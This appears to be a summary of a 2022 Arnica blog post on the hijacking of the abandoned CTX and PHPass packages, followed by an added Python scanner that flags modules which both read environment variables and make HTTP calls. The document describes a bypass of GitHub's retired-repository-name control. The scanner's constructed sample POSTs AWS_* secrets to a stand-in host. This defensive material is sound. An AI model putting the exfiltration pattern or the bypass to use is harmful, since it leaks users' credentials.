Tracing the Impact of a Clothing Retailer's Software Supply Chain Breach on Your Production Environment
Open-source projects are at risk when their maintainers abandon them, as the cases of the CTX Python library and the PHPass PHP library show.

Between September 2021 and May 2022, the Nordstrom-owned clothing brand HauteLook closed its GitHub account and stopped contributing to the open-source community. In September 2021 it removed its popular AliceBundle repo without any explanation. On May 15th, 2022, a third party registered the GitHub username HauteLook again.

Open-source developer FigLeif, who developed and maintained the CTX Python package, was inactive between July 2020 and May 2022. His email domain expired in August 2021 and was re-registered by the same third party that had reclaimed the HauteLook username.

The third party then recreated the retired repos: CTX, and HauteLook's most prominent repo, the password hashing library PHPass. GitHub has a security control that blocks creating a repository under a name that matches a retired repository name, but the new owner of the FigLeif and HauteLook accounts found a bypass: change your username to something other than the retired repository's previous owner, create a repository with the retired name, then change the username back.

The security researcher Yunus Aydin, who took over these repositories, blogged about the attack and posted it on his LinkedIn. He modified the packages so that whenever they run, the AWS environment variables are sent to a Heroku-hosted app he controlled. This is dangerous because many applications keep sensitive secrets in environment variables, so for anyone who installed the hijacked versions the blast radius is every secret visible to the process that imported them, and those credentials should be treated as exposed and rotated. Because Yunus controlled FigLeif's domain, he was able to reset the PyPI password and upload a malicious package on May 14th. The security researcher Somdev found additional instances of this pattern by running a GitHub search.

All open-source software needs a succession plan for when its maintainers move on. Building a successful, stable, useful library is surprisingly thankless.
Both PHPass and CTX hadn't been touched in years and hadn't needed to be. Their developers can't be blamed for losing interest.
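The hijacked packages combined two things that are individually common but together worth a second look: reading the process environment and making an outbound HTTP request. The following static check flags Python modules that do both, so it can be run over an installed site-packages tree to triage which dependencies deserve a closer read. It is an added example written for this summary, not code from the article or from the CTX or PHPass packages; the two sample modules are constructed, and the list of environment-reading and HTTP-calling names it recognises is an assumed starting set, not an exhaustive one.

```python
"""Static check for the exfiltration pattern described above: a module
that both reads environment variables and makes an outbound HTTP call.

Added illustration, not code from the article or from the CTX or PHPass
packages. The module samples at the bottom are constructed, and the set of
recognised HTTP and environment APIs is an assumed short list."""
import ast
import pathlib

# Fully qualified names treated as environment reads and network calls.
ENV_READS = {("os", "environ"), ("os", "getenv")}
NET_CALLS = {
    ("requests", "get"), ("requests", "post"), ("requests", "put"),
    ("urllib", "request", "urlopen"),
    ("http", "client", "HTTPConnection"), ("http", "client", "HTTPSConnection"),
}


def _collect_aliases(tree):
    """Map local names to the dotted module path they were imported from."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                if a.asname:
                    aliases[a.asname] = tuple(a.name.split("."))
                else:  # `import urllib.request` binds the top-level name only
                    top = a.name.split(".")[0]
                    aliases[top] = (top,)
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                aliases[a.asname or a.name] = tuple(node.module.split(".")) + (a.name,)
    return aliases


def _resolve(node, aliases):
    """Turn `a.b.c` (where `a` may be an import alias) into a name tuple."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return None
    return aliases.get(node.id, (node.id,)) + tuple(reversed(parts))


def scan_source(source, filename="<module>"):
    """Report where a module reads the environment and where it talks to the
    network; 'suspicious' is set when the same module does both."""
    tree = ast.parse(source, filename)
    aliases = _collect_aliases(tree)
    env_lines, net_lines = set(), set()
    for node in ast.walk(tree):
        if isinstance(node, (ast.Attribute, ast.Name)):
            if _resolve(node, aliases) in ENV_READS:
                env_lines.add(node.lineno)
        if isinstance(node, ast.Call) and _resolve(node.func, aliases) in NET_CALLS:
            net_lines.add(node.lineno)
    return {
        "file": filename,
        "env_reads": sorted(env_lines),
        "net_calls": sorted(net_lines),
        "suspicious": bool(env_lines) and bool(net_lines),
    }


def scan_directory(root):
    """Scan every .py file under `root` (e.g. a site-packages directory) and
    return only the reports flagged as suspicious."""
    hits = []
    for path in pathlib.Path(root).rglob("*.py"):
        try:
            report = scan_source(path.read_text(encoding="utf-8", errors="replace"), str(path))
        except SyntaxError:
            continue
        if report["suspicious"]:
            hits.append(report)
    return hits


# Constructed samples: a harmless config read, and a module shaped like the
# hijacked packages (collect AWS_* variables, POST them to a remote host).
BENIGN_SAMPLE = """import os
DEBUG = os.getenv("APP_DEBUG", "0") == "1"

def add(a, b):
    return a + b
"""

EXFIL_SAMPLE = """import os
import requests as r

def _beacon():
    secrets = {k: v for k, v in os.environ.items() if k.startswith("AWS_")}
    r.post("https://collector.example.invalid/", json=secrets)

_beacon()
"""

if __name__ == "__main__":
    for name, src in (("benign", BENIGN_SAMPLE), ("exfil", EXFIL_SAMPLE)):
        print(name, scan_source(src, name))
```

Point `scan_directory` at the site-packages directory of a production image to get a short list of modules to inspect by hand. It is a triage heuristic, not a verdict: legitimate cloud SDKs also read AWS variables and talk to the network, and a package that hides its calls behind `exec`, `getattr` or a decoded string will not be caught. The more reliable signal for a case like this one is a release pushed to the package index after years of silence, which the package's own version history shows without any code analysis.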
Company
Arnica
Date published
May 25, 2022
Author(s)
Mike Doyle
Word count
467
Language
English
Hacker News points
5